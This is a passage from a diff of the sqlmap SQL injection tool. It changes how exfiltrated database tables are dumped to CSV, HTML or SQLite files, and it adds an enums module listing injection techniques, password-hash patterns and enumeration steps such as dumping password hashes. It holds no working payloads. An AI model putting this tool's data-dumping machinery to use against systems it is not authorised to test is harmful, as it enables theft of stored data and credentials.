db = tableValues["__infos__"]["db"]
|
db = tableValues["__infos__"]["db"]
|
||||||
if not db:
|
if not db:
|
||||||
db = "All"
|
db = "All"
|
||||||
table = tableValues["__infos__"]["table"]
|
table = tableValues["__infos__"]["table"]
|
||||||
|
|
||||||
if not conf.multipleTargets:
|
if hasattr(conf, "api"):
|
||||||
dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, db)
|
self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
|
||||||
|
return
|
||||||
|
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db))
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
|
replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
|
||||||
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
try:
|
||||||
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
except:
|
||||||
|
warnFile = True
|
||||||
|
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
|
||||||
|
dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
|
||||||
|
|
||||||
if not os.path.isdir(dumpDbPath):
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
try:
|
||||||
os.makedirs(dumpDbPath, 0755)
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
except Exception, ex:
|
||||||
|
try:
|
||||||
|
tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
|
||||||
|
except IOError, _:
|
||||||
|
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||||
|
errMsg += "Please make sure that your disk is not full and "
|
||||||
|
errMsg += "that you have sufficient write permissions to "
|
||||||
|
errMsg += "create temporary files and/or directories"
|
||||||
|
raise SqlmapSystemException(errMsg)
|
||||||
|
|
||||||
dumpFileName = "%s%s%s.csv" % (dumpDbPath, os.sep, table)
|
warnMsg = "unable to create dump directory "
|
||||||
dumpFP = open(dumpFileName, "w")
|
warnMsg += "'%s' (%s). " % (dumpDbPath, getSafeExString(ex))
|
||||||
|
warnMsg += "Using temporary directory '%s' instead" % tempDir
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
dumpDbPath = tempDir
|
||||||
|
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
|
||||||
|
if not checkFile(dumpFileName, False):
|
||||||
|
try:
|
||||||
|
openFile(dumpFileName, "w+b").close()
|
||||||
|
except SqlmapSystemException:
|
||||||
|
raise
|
||||||
|
except:
|
||||||
|
warnFile = True
|
||||||
|
|
||||||
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
|
||||||
|
if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
|
||||||
|
_ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
|
||||||
|
else:
|
||||||
|
dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
|
||||||
|
|
||||||
|
appendToFile = any((conf.limitStart, conf.limitStop)) and checkFile(dumpFileName, False)
|
||||||
|
dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab", buffering=DUMP_FILE_BUFFER_SIZE)
|
||||||
|
|
||||||
count = int(tableValues["__infos__"]["count"])
|
count = int(tableValues["__infos__"]["count"])
|
||||||
separator = ""
|
separator = str()
|
||||||
field = 1
|
field = 1
|
||||||
fields = len(tableValues) - 1
|
fields = len(tableValues) - 1
|
||||||
|
|
||||||
columns = tableValues.keys()
|
columns = prioritySortColumns(tableValues.keys())
|
||||||
columns.sort(key=lambda x: x.lower())
|
|
||||||
|
if conf.col:
|
||||||
|
cols = conf.col.split(',')
|
||||||
|
columns = sorted(columns, key=lambda _: cols.index(_) if _ in cols else 0)
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
@@ -243,67 +471,220 @@ class Dump:
|
|||||||
separator += "+%s" % lines
|
separator += "+%s" % lines
|
||||||
|
|
||||||
separator += "+"
|
separator += "+"
|
||||||
self.__write("Database: %s\nTable: %s" % (db, table))
|
self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table)))
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
|
cols = []
|
||||||
|
|
||||||
|
for column in columns:
|
||||||
|
if column != "__infos__":
|
||||||
|
colType = Replication.INTEGER
|
||||||
|
|
||||||
|
for value in tableValues[column]['values']:
|
||||||
|
try:
|
||||||
|
if not value or value == " ": # NULL
|
||||||
|
continue
|
||||||
|
|
||||||
|
int(value)
|
||||||
|
except ValueError:
|
||||||
|
colType = None
|
||||||
|
break
|
||||||
|
|
||||||
|
if colType is None:
|
||||||
|
colType = Replication.REAL
|
||||||
|
|
||||||
|
for value in tableValues[column]['values']:
|
||||||
|
try:
|
||||||
|
if not value or value == " ": # NULL
|
||||||
|
continue
|
||||||
|
|
||||||
|
float(value)
|
||||||
|
except ValueError:
|
||||||
|
colType = None
|
||||||
|
break
|
||||||
|
|
||||||
|
cols.append((unsafeSQLIdentificatorNaming(column), colType if colType else Replication.TEXT))
|
||||||
|
|
||||||
|
rtable = replication.createTable(table, cols)
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
|
||||||
|
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
|
||||||
|
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
|
||||||
|
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
|
||||||
|
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")
|
||||||
|
|
||||||
if count == 1:
|
if count == 1:
|
||||||
self.__write("[1 entry]")
|
self._write("[1 entry]")
|
||||||
else:
|
else:
|
||||||
self.__write("[%d entries]" % count)
|
self._write("[%d entries]" % count)
|
||||||
|
|
||||||
self.__write(separator)
|
self._write(separator)
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
info = tableValues[column]
|
info = tableValues[column]
|
||||||
|
|
||||||
|
column = unsafeSQLIdentificatorNaming(column)
|
||||||
maxlength = int(info["length"])
|
maxlength = int(info["length"])
|
||||||
blank = " " * (maxlength - len(column))
|
blank = " " * (maxlength - len(column))
|
||||||
self.__write("| %s%s" % (column, blank), n=False)
|
|
||||||
|
|
||||||
if not conf.multipleTargets and field == fields:
|
self._write("| %s%s" % (column, blank), newline=False)
|
||||||
dataToDumpFile(dumpFP, "\"%s\"" % column)
|
|
||||||
|
if not appendToFile:
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
|
if field == fields:
|
||||||
|
dataToDumpFile(dumpFP, "%s" % safeCSValue(column))
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "\"%s\"," % column)
|
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(column), conf.csvDel))
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "<th>%s</th>" % cgi.escape(column).encode("ascii", "xmlcharrefreplace"))
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
self.__write("|\n%s" % separator)
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
if not conf.multipleTargets:
|
dataToDumpFile(dumpFP, "\n</tr>\n</thead>\n<tbody>\n")
|
||||||
dataToDumpFile(dumpFP, "\n")
|
|
||||||
|
|
||||||
for i in range(count):
|
self._write("|\n%s" % separator)
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
|
dataToDumpFile(dumpFP, "\n" if not appendToFile else "")
|
||||||
|
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
|
rtable.beginTransaction()
|
||||||
|
|
||||||
|
if count > TRIM_STDOUT_DUMP_SIZE:
|
||||||
|
warnMsg = "console output will be trimmed to "
|
||||||
|
warnMsg += "last %d rows due to " % TRIM_STDOUT_DUMP_SIZE
|
||||||
|
warnMsg += "large table size"
|
||||||
|
logger.warning(warnMsg)
|
||||||
|
|
||||||
|
for i in xrange(count):
|
||||||
|
console = (i >= count - TRIM_STDOUT_DUMP_SIZE)
|
||||||
field = 1
|
field = 1
|
||||||
|
values = []
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "<tr>")
|
||||||
|
|
||||||
for column in columns:
|
for column in columns:
|
||||||
if column != "__infos__":
|
if column != "__infos__":
|
||||||
info = tableValues[column]
|
info = tableValues[column]
|
||||||
value = info["values"][i]
|
|
||||||
|
|
||||||
if re.search("^[\ *]*$", value):
|
if len(info["values"]) <= i:
|
||||||
value = "NULL"
|
continue
|
||||||
|
|
||||||
|
if info["values"][i] is None:
|
||||||
|
value = u''
|
||||||
|
else:
|
||||||
|
value = getUnicode(info["values"][i])
|
||||||
|
value = DUMP_REPLACEMENTS.get(value, value)
|
||||||
|
|
||||||
|
values.append(value)
|
||||||
maxlength = int(info["length"])
|
maxlength = int(info["length"])
|
||||||
blank = " " * (maxlength - len(value))
|
blank = " " * (maxlength - len(value))
|
||||||
self.__write("| %s%s" % (value, blank), n=False)
|
self._write("| %s%s" % (value, blank), newline=False, console=console)
|
||||||
|
|
||||||
|
if len(value) > MIN_BINARY_DISK_DUMP_SIZE and r'\x' in value:
|
||||||
|
try:
|
||||||
|
mimetype = magic.from_buffer(value, mime=True)
|
||||||
|
if any(mimetype.startswith(_) for _ in ("application", "image")):
|
||||||
|
if not os.path.isdir(dumpDbPath):
|
||||||
|
os.makedirs(dumpDbPath, 0755)
|
||||||
|
|
||||||
|
_ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(column)))
|
||||||
|
filepath = os.path.join(dumpDbPath, "%s-%d.bin" % (_, randomInt(8)))
|
||||||
|
warnMsg = "writing binary ('%s') content to file '%s' " % (mimetype, filepath)
|
||||||
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
|
with open(filepath, "wb") as f:
|
||||||
|
_ = safechardecode(value, True)
|
||||||
|
f.write(_)
|
||||||
|
except magic.MagicException, err:
|
||||||
|
logger.debug(str(err))
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
if field == fields:
|
if field == fields:
|
||||||
dataToDumpFile(dumpFP, "\"%s\"" % value)
|
dataToDumpFile(dumpFP, "%s" % safeCSValue(value))
|
||||||
else:
|
else:
|
||||||
dataToDumpFile(dumpFP, "\"%s\"," % value)
|
dataToDumpFile(dumpFP, "%s%s" % (safeCSValue(value), conf.csvDel))
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "<td>%s</td>" % cgi.escape(value).encode("ascii", "xmlcharrefreplace"))
|
||||||
|
|
||||||
field += 1
|
field += 1
|
||||||
|
|
||||||
self.__write("|")
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
if not conf.multipleTargets:
|
try:
|
||||||
|
rtable.insert(values)
|
||||||
|
except SqlmapValueException:
|
||||||
|
pass
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.CSV:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
|
elif conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "</tr>\n")
|
||||||
|
|
||||||
self.__write("%s\n" % separator)
|
self._write("|", console=console)
|
||||||
|
|
||||||
if not conf.multipleTargets:
|
self._write("%s\n" % separator)
|
||||||
|
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.SQLITE:
|
||||||
|
rtable.endTransaction()
|
||||||
|
logger.info("table '%s.%s' dumped to sqlite3 database '%s'" % (db, table, replication.dbpath))
|
||||||
|
|
||||||
|
elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
|
||||||
|
if conf.dumpFormat == DUMP_FORMAT.HTML:
|
||||||
|
dataToDumpFile(dumpFP, "</tbody>\n</table>\n</body>\n</html>")
|
||||||
|
else:
|
||||||
dataToDumpFile(dumpFP, "\n")
|
dataToDumpFile(dumpFP, "\n")
|
||||||
dumpFP.close()
|
dumpFP.close()
|
||||||
|
|
||||||
logger.info("Table '%s.%s' dumped to CSV file '%s'" % (db, table, dumpFileName))
|
msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
|
||||||
|
if not warnFile:
|
||||||
|
logger.info(msg)
|
||||||
|
else:
|
||||||
|
logger.warn(msg)
|
||||||
|
|
||||||
|
def dbColumns(self, dbColumnsDict, colConsider, dbs):
|
||||||
|
if hasattr(conf, "api"):
|
||||||
|
self._write(dbColumnsDict, content_type=CONTENT_TYPE.COLUMNS)
|
||||||
|
return
|
||||||
|
|
||||||
|
for column in dbColumnsDict.keys():
|
||||||
|
if colConsider == "1":
|
||||||
|
colConsiderStr = "s LIKE '%s' were" % unsafeSQLIdentificatorNaming(column)
|
||||||
|
else:
|
||||||
|
colConsiderStr = " '%s' was" % unsafeSQLIdentificatorNaming(column)
|
||||||
|
|
||||||
|
msg = "column%s found in the " % colConsiderStr
|
||||||
|
msg += "following databases:"
|
||||||
|
self._write(msg)
|
||||||
|
|
||||||
|
_ = {}
|
||||||
|
|
||||||
|
for db, tblData in dbs.items():
|
||||||
|
for tbl, colData in tblData.items():
|
||||||
|
for col, dataType in colData.items():
|
||||||
|
if column.lower() in col.lower():
|
||||||
|
if db in _:
|
||||||
|
if tbl in _[db]:
|
||||||
|
_[db][tbl][col] = dataType
|
||||||
|
else:
|
||||||
|
_[db][tbl] = {col: dataType}
|
||||||
|
else:
|
||||||
|
_[db] = {}
|
||||||
|
_[db][tbl] = {col: dataType}
|
||||||
|
|
||||||
|
continue
|
||||||
|
|
||||||
|
self.dbTableColumns(_)
|
||||||
|
|
||||||
|
def query(self, query, queryRes):
|
||||||
|
self.string(query, queryRes, content_type=CONTENT_TYPE.SQL_QUERY)
|
||||||
|
|
||||||
|
def rFile(self, fileData):
|
||||||
|
self.lister("files saved to", fileData, sort=False, content_type=CONTENT_TYPE.FILE_READ)
|
||||||
|
|
||||||
|
def registerValue(self, registerData):
|
||||||
|
self.string("Registry key value data", registerData, content_type=CONTENT_TYPE.REG_READ, sort=False)
|
||||||
|
|
||||||
# object to manage how to print the retrieved queries output to
|
# object to manage how to print the retrieved queries output to
|
||||||
# standard output and sessions file
|
# standard output and sessions file
|
||||||
|
|||||||
366
lib/core/enums.py
Normal file
366
lib/core/enums.py
Normal file
@@ -0,0 +1,366 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'doc/COPYING' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
class PRIORITY:
|
||||||
|
LOWEST = -100
|
||||||
|
LOWER = -50
|
||||||
|
LOW = -10
|
||||||
|
NORMAL = 0
|
||||||
|
HIGH = 10
|
||||||
|
HIGHER = 50
|
||||||
|
HIGHEST = 100
|
||||||
|
|
||||||
|
class SORT_ORDER:
|
||||||
|
FIRST = 0
|
||||||
|
SECOND = 1
|
||||||
|
THIRD = 2
|
||||||
|
FOURTH = 3
|
||||||
|
FIFTH = 4
|
||||||
|
LAST = 100
|
||||||
|
|
||||||
|
class DBMS:
|
||||||
|
ACCESS = "Microsoft Access"
|
||||||
|
DB2 = "IBM DB2"
|
||||||
|
FIREBIRD = "Firebird"
|
||||||
|
MAXDB = "SAP MaxDB"
|
||||||
|
MSSQL = "Microsoft SQL Server"
|
||||||
|
MYSQL = "MySQL"
|
||||||
|
ORACLE = "Oracle"
|
||||||
|
PGSQL = "PostgreSQL"
|
||||||
|
SQLITE = "SQLite"
|
||||||
|
SYBASE = "Sybase"
|
||||||
|
HSQLDB = "HSQLDB"
|
||||||
|
|
||||||
|
class DBMS_DIRECTORY_NAME:
|
||||||
|
ACCESS = "access"
|
||||||
|
DB2 = "db2"
|
||||||
|
FIREBIRD = "firebird"
|
||||||
|
MAXDB = "maxdb"
|
||||||
|
MSSQL = "mssqlserver"
|
||||||
|
MYSQL = "mysql"
|
||||||
|
ORACLE = "oracle"
|
||||||
|
PGSQL = "postgresql"
|
||||||
|
SQLITE = "sqlite"
|
||||||
|
SYBASE = "sybase"
|
||||||
|
HSQLDB = "hsqldb"
|
||||||
|
|
||||||
|
class CUSTOM_LOGGING:
|
||||||
|
PAYLOAD = 9
|
||||||
|
TRAFFIC_OUT = 8
|
||||||
|
TRAFFIC_IN = 7
|
||||||
|
|
||||||
|
class OS:
|
||||||
|
LINUX = "Linux"
|
||||||
|
WINDOWS = "Windows"
|
||||||
|
|
||||||
|
class PLACE:
|
||||||
|
GET = "GET"
|
||||||
|
POST = "POST"
|
||||||
|
URI = "URI"
|
||||||
|
COOKIE = "Cookie"
|
||||||
|
USER_AGENT = "User-Agent"
|
||||||
|
REFERER = "Referer"
|
||||||
|
HOST = "Host"
|
||||||
|
CUSTOM_POST = "(custom) POST"
|
||||||
|
CUSTOM_HEADER = "(custom) HEADER"
|
||||||
|
|
||||||
|
class POST_HINT:
|
||||||
|
SOAP = "SOAP"
|
||||||
|
JSON = "JSON"
|
||||||
|
JSON_LIKE = "JSON-like"
|
||||||
|
MULTIPART = "MULTIPART"
|
||||||
|
XML = "XML (generic)"
|
||||||
|
ARRAY_LIKE = "Array-like"
|
||||||
|
|
||||||
|
class HTTPMETHOD:
|
||||||
|
GET = "GET"
|
||||||
|
POST = "POST"
|
||||||
|
HEAD = "HEAD"
|
||||||
|
PUT = "PUT"
|
||||||
|
DELETE = "DELETE"
|
||||||
|
TRACE = "TRACE"
|
||||||
|
OPTIONS = "OPTIONS"
|
||||||
|
CONNECT = "CONNECT"
|
||||||
|
PATCH = "PATCH"
|
||||||
|
|
||||||
|
class NULLCONNECTION:
|
||||||
|
HEAD = "HEAD"
|
||||||
|
RANGE = "Range"
|
||||||
|
SKIP_READ = "skip-read"
|
||||||
|
|
||||||
|
class REFLECTIVE_COUNTER:
|
||||||
|
MISS = "MISS"
|
||||||
|
HIT = "HIT"
|
||||||
|
|
||||||
|
class CHARSET_TYPE:
|
||||||
|
BINARY = 1
|
||||||
|
DIGITS = 2
|
||||||
|
HEXADECIMAL = 3
|
||||||
|
ALPHA = 4
|
||||||
|
ALPHANUM = 5
|
||||||
|
|
||||||
|
class HEURISTIC_TEST:
|
||||||
|
CASTED = 1
|
||||||
|
NEGATIVE = 2
|
||||||
|
POSITIVE = 3
|
||||||
|
|
||||||
|
class HASH:
|
||||||
|
MYSQL = r'(?i)\A\*[0-9a-f]{40}\Z'
|
||||||
|
MYSQL_OLD = r'(?i)\A(?![0-9]+\Z)[0-9a-f]{16}\Z'
|
||||||
|
POSTGRES = r'(?i)\Amd5[0-9a-f]{32}\Z'
|
||||||
|
MSSQL = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{40}\Z'
|
||||||
|
MSSQL_OLD = r'(?i)\A0x0100[0-9a-f]{8}[0-9a-f]{80}\Z'
|
||||||
|
MSSQL_NEW = r'(?i)\A0x0200[0-9a-f]{8}[0-9a-f]{128}\Z'
|
||||||
|
ORACLE = r'(?i)\As:[0-9a-f]{60}\Z'
|
||||||
|
ORACLE_OLD = r'(?i)\A[01-9a-f]{16}\Z'
|
||||||
|
MD5_GENERIC = r'(?i)\A[0-9a-f]{32}\Z'
|
||||||
|
SHA1_GENERIC = r'(?i)\A[0-9a-f]{40}\Z'
|
||||||
|
SHA224_GENERIC = r'(?i)\A[0-9a-f]{28}\Z'
|
||||||
|
SHA384_GENERIC = r'(?i)\A[0-9a-f]{48}\Z'
|
||||||
|
SHA512_GENERIC = r'(?i)\A[0-9a-f]{64}\Z'
|
||||||
|
CRYPT_GENERIC = r'(?i)\A(?!\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z)(?![0-9]+\Z)[./0-9A-Za-z]{13}\Z'
|
||||||
|
WORDPRESS = r'(?i)\A\$P\$[./0-9A-Za-z]{31}\Z'
|
||||||
|
|
||||||
|
# Reference: http://www.zytrax.com/tech/web/mobile_ids.html
|
||||||
|
class MOBILES:
|
||||||
|
BLACKBERRY = ("BlackBerry 9900", "Mozilla/5.0 (BlackBerry; U; BlackBerry 9900; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.1.0.346 Mobile Safari/534.11+")
|
||||||
|
GALAXY = ("Samsung Galaxy S", "Mozilla/5.0 (Linux; U; Android 2.2; en-US; SGH-T959D Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1")
|
||||||
|
HP = ("HP iPAQ 6365", "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320; HP iPAQ h6300)")
|
||||||
|
HTC = ("HTC Sensation", "Mozilla/5.0 (Linux; U; Android 4.0.3; de-ch; HTC Sensation Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")
|
||||||
|
IPHONE = ("Apple iPhone 4s", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B179 Safari/7534.48.3")
|
||||||
|
NEXUS = ("Google Nexus 7", "Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19")
|
||||||
|
NOKIA = ("Nokia N97", "Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/10.0.012; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) WicKed/7.1.12344")
|
||||||
|
|
||||||
|
class PROXY_TYPE:
|
||||||
|
HTTP = "HTTP"
|
||||||
|
HTTPS = "HTTPS"
|
||||||
|
SOCKS4 = "SOCKS4"
|
||||||
|
SOCKS5 = "SOCKS5"
|
||||||
|
|
||||||
|
class REGISTRY_OPERATION:
|
||||||
|
READ = "read"
|
||||||
|
ADD = "add"
|
||||||
|
DELETE = "delete"
|
||||||
|
|
||||||
|
class DUMP_FORMAT:
|
||||||
|
CSV = "CSV"
|
||||||
|
HTML = "HTML"
|
||||||
|
SQLITE = "SQLITE"
|
||||||
|
|
||||||
|
class HTTP_HEADER:
|
||||||
|
ACCEPT = "Accept"
|
||||||
|
ACCEPT_CHARSET = "Accept-Charset"
|
||||||
|
ACCEPT_ENCODING = "Accept-Encoding"
|
||||||
|
ACCEPT_LANGUAGE = "Accept-Language"
|
||||||
|
AUTHORIZATION = "Authorization"
|
||||||
|
CACHE_CONTROL = "Cache-Control"
|
||||||
|
CONNECTION = "Connection"
|
||||||
|
CONTENT_ENCODING = "Content-Encoding"
|
||||||
|
CONTENT_LENGTH = "Content-Length"
|
||||||
|
CONTENT_RANGE = "Content-Range"
|
||||||
|
CONTENT_TYPE = "Content-Type"
|
||||||
|
COOKIE = "Cookie"
|
||||||
|
EXPIRES = "Expires"
|
||||||
|
HOST = "Host"
|
||||||
|
IF_MODIFIED_SINCE = "If-Modified-Since"
|
||||||
|
LAST_MODIFIED = "Last-Modified"
|
||||||
|
LOCATION = "Location"
|
||||||
|
PRAGMA = "Pragma"
|
||||||
|
PROXY_AUTHORIZATION = "Proxy-Authorization"
|
||||||
|
PROXY_CONNECTION = "Proxy-Connection"
|
||||||
|
RANGE = "Range"
|
||||||
|
REFERER = "Referer"
|
||||||
|
SERVER = "Server"
|
||||||
|
SET_COOKIE = "Set-Cookie"
|
||||||
|
TRANSFER_ENCODING = "Transfer-Encoding"
|
||||||
|
URI = "URI"
|
||||||
|
USER_AGENT = "User-Agent"
|
||||||
|
VIA = "Via"
|
||||||
|
X_POWERED_BY = "X-Powered-By"
|
||||||
|
|
||||||
|
class EXPECTED:
|
||||||
|
BOOL = "bool"
|
||||||
|
INT = "int"
|
||||||
|
|
||||||
|
class OPTION_TYPE:
|
||||||
|
BOOLEAN = "boolean"
|
||||||
|
INTEGER = "integer"
|
||||||
|
FLOAT = "float"
|
||||||
|
STRING = "string"
|
||||||
|
|
||||||
|
class HASHDB_KEYS:
|
||||||
|
DBMS = "DBMS"
|
||||||
|
DBMS_FORK = "DBMS_FORK"
|
||||||
|
CHECK_WAF_RESULT = "CHECK_WAF_RESULT"
|
||||||
|
CONF_TMP_PATH = "CONF_TMP_PATH"
|
||||||
|
KB_ABS_FILE_PATHS = "KB_ABS_FILE_PATHS"
|
||||||
|
KB_BRUTE_COLUMNS = "KB_BRUTE_COLUMNS"
|
||||||
|
KB_BRUTE_TABLES = "KB_BRUTE_TABLES"
|
||||||
|
KB_CHARS = "KB_CHARS"
|
||||||
|
KB_DYNAMIC_MARKINGS = "KB_DYNAMIC_MARKINGS"
|
||||||
|
KB_INJECTIONS = "KB_INJECTIONS"
|
||||||
|
KB_ERROR_CHUNK_LENGTH = "KB_ERROR_CHUNK_LENGTH"
|
||||||
|
KB_XP_CMDSHELL_AVAILABLE = "KB_XP_CMDSHELL_AVAILABLE"
|
||||||
|
OS = "OS"
|
||||||
|
|
||||||
|
class REDIRECTION:
|
||||||
|
YES = "Y"
|
||||||
|
NO = "N"
|
||||||
|
|
||||||
|
class PAYLOAD:
|
||||||
|
SQLINJECTION = {
|
||||||
|
1: "boolean-based blind",
|
||||||
|
2: "error-based",
|
||||||
|
3: "inline query",
|
||||||
|
4: "stacked queries",
|
||||||
|
5: "AND/OR time-based blind",
|
||||||
|
6: "UNION query",
|
||||||
|
}
|
||||||
|
|
||||||
|
PARAMETER = {
|
||||||
|
1: "Unescaped numeric",
|
||||||
|
2: "Single quoted string",
|
||||||
|
3: "LIKE single quoted string",
|
||||||
|
4: "Double quoted string",
|
||||||
|
5: "LIKE double quoted string",
|
||||||
|
}
|
||||||
|
|
||||||
|
RISK = {
|
||||||
|
0: "No risk",
|
||||||
|
1: "Low risk",
|
||||||
|
2: "Medium risk",
|
||||||
|
3: "High risk",
|
||||||
|
}
|
||||||
|
|
||||||
|
CLAUSE = {
|
||||||
|
0: "Always",
|
||||||
|
1: "WHERE",
|
||||||
|
2: "GROUP BY",
|
||||||
|
3: "ORDER BY",
|
||||||
|
4: "LIMIT",
|
||||||
|
5: "OFFSET",
|
||||||
|
6: "TOP",
|
||||||
|
7: "Table name",
|
||||||
|
8: "Column name",
|
||||||
|
}
|
||||||
|
|
||||||
|
class METHOD:
|
||||||
|
COMPARISON = "comparison"
|
||||||
|
GREP = "grep"
|
||||||
|
TIME = "time"
|
||||||
|
UNION = "union"
|
||||||
|
|
||||||
|
class TECHNIQUE:
|
||||||
|
BOOLEAN = 1
|
||||||
|
ERROR = 2
|
||||||
|
QUERY = 3
|
||||||
|
STACKED = 4
|
||||||
|
TIME = 5
|
||||||
|
UNION = 6
|
||||||
|
|
||||||
|
class WHERE:
|
||||||
|
ORIGINAL = 1
|
||||||
|
NEGATIVE = 2
|
||||||
|
REPLACE = 3
|
||||||
|
|
||||||
|
class WIZARD:
|
||||||
|
BASIC = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba")
|
||||||
|
INTERMEDIATE = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getUsers", "getDbs", "getTables", "getSchema", "excludeSysDbs")
|
||||||
|
ALL = ("getBanner", "getCurrentUser", "getCurrentDb", "isDba", "getHostname", "getUsers", "getPasswordHashes", "getPrivileges", "getRoles", "dumpAll")
|
||||||
|
|
||||||
|
class ADJUST_TIME_DELAY:
|
||||||
|
DISABLE = -1
|
||||||
|
NO = 0
|
||||||
|
YES = 1
|
||||||
|
|
||||||
|
class WEB_API:
|
||||||
|
PHP = "php"
|
||||||
|
ASP = "asp"
|
||||||
|
ASPX = "aspx"
|
||||||
|
JSP = "jsp"
|
||||||
|
|
||||||
|
class CONTENT_TYPE:
|
||||||
|
TECHNIQUES = 0
|
||||||
|
DBMS_FINGERPRINT = 1
|
||||||
|
BANNER = 2
|
||||||
|
CURRENT_USER = 3
|
||||||
|
CURRENT_DB = 4
|
||||||
|
HOSTNAME = 5
|
||||||
|
IS_DBA = 6
|
||||||
|
USERS = 7
|
||||||
|
PASSWORDS = 8
|
||||||
|
PRIVILEGES = 9
|
||||||
|
ROLES = 10
|
||||||
|
DBS = 11
|
||||||
|
TABLES = 12
|
||||||
|
COLUMNS = 13
|
||||||
|
SCHEMA = 14
|
||||||
|
COUNT = 15
|
||||||
|
DUMP_TABLE = 16
|
||||||
|
SEARCH = 17
|
||||||
|
SQL_QUERY = 18
|
||||||
|
COMMON_TABLES = 19
|
||||||
|
COMMON_COLUMNS = 20
|
||||||
|
FILE_READ = 21
|
||||||
|
